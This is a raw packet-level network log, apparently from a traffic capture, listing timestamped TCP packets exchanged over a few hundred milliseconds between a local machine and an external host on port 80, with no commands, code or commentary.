                                                                                                                                                                                  Nov 23, 2024 14:46:40.278112888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.278184891 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.278209925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.279169083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.279213905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.279278040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.280266047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.280339956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.280379057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.281320095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.281425953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.281469107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.282386065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.282426119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.282572985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.283552885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.283642054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.283683062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.284539938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.284667969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.284696102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.285607100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.285650015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.285708904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.286737919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.286789894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.286849022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.287854910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.287905931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.287966013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.288897038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.288960934 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.288986921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.289949894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.289990902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.290071964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.290160894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.291121960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.291186094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.291235924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.292103052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.292154074 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.292217016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.293168068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.293222904 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.293268919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.294249058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.294295073 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.294308901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.309577942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.344415903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.407808065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.407890081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.407937050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.408325911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.408437967 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.408471107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.409410000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.409524918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.409559965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.410434961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.434246063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.434262037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.434315920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.434592009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.434627056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.434689045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.435682058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.435794115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.435839891 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.436952114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.437071085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.437112093 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.437835932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.437875986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.437917948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.439141989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.439202070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.439248085 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.440006971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.440051079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.440115929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.441071033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.441127062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.441140890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.442137957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.442226887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.442244053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.443234921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.443298101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.443330050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.444344997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.444418907 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.444506884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.445388079 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.445432901 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.445538044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.446444035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.446580887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.446616888 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.447549105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.447591066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.447596073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.448574066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.448652029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.448698997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.449665070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.449706078 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.449767113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.450742960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.450783968 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.450856924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.451818943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.451855898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.451900959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.452897072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.452935934 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.452955961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.453963041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.454020977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.454042912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.455043077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.455085039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.455111980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.456108093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.456155062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.456181049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.457640886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.457647085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.457767963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.457920074 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.458237886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.458283901 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.458343983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.459333897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.459372044 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.459429979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.460410118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.460448980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.460498095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.461473942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.461519957 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.461585999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.462589025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.462670088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.462680101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.463643074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.463702917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.463737965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.464735985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.464824915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.464875937 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.465781927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.465820074 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.465883017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.466856003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.466905117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.466949940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.467972994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.468012094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.468060017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.468321085 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.469003916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.469120026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.469152927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.470103025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.470138073 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.470211983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.471220016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.471266985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.471430063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.472260952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.472306013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.472322941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.473306894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.473346949 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.473427057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.474383116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.474493980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.474518061 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.475495100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.475509882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.475555897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.476540089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.476584911 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.476636887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.477627993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.477668047 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.477711916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.478698969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.478795052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.478831053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.479768038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.479862928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.479912996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.480815887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.480829954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.480863094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.480942011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.481942892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.481975079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.481987953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.482988119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.483033895 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.483093023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.484069109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.484119892 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.484153032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.485169888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.485240936 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.485261917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.486242056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.486303091 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.486311913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.504867077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.584296942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.600065947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.600164890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.600250006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.600595951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.600727081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.600768089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.601613045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.601821899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.601872921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.602679014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.611699104 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.626271009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.626317978 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.626441002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.626781940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.626844883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.626862049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.626904011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.627873898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.628001928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.628036022 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.628989935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.629028082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.629100084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.630024910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.630069017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.630172014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.631086111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.631129026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.631206036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.632193089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.632246017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.632271051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.633274078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.633311033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.633388042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.634334087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.634367943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.634562969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.635436058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.635500908 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.635555983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.636476040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.636519909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.636569023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.637633085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.637671947 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.637713909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.638669968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.638726950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.638891935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.639667988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.639698982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.639748096 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.639828920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.640793085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.640889883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.640953064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.642019987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.642174959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.642241001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.642916918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.643043041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.643095970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.643980026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.644031048 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.645104885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.645117044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.645168066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.649564028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.649604082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.649624109 CET8049744185.215.113.16192.168.2.4
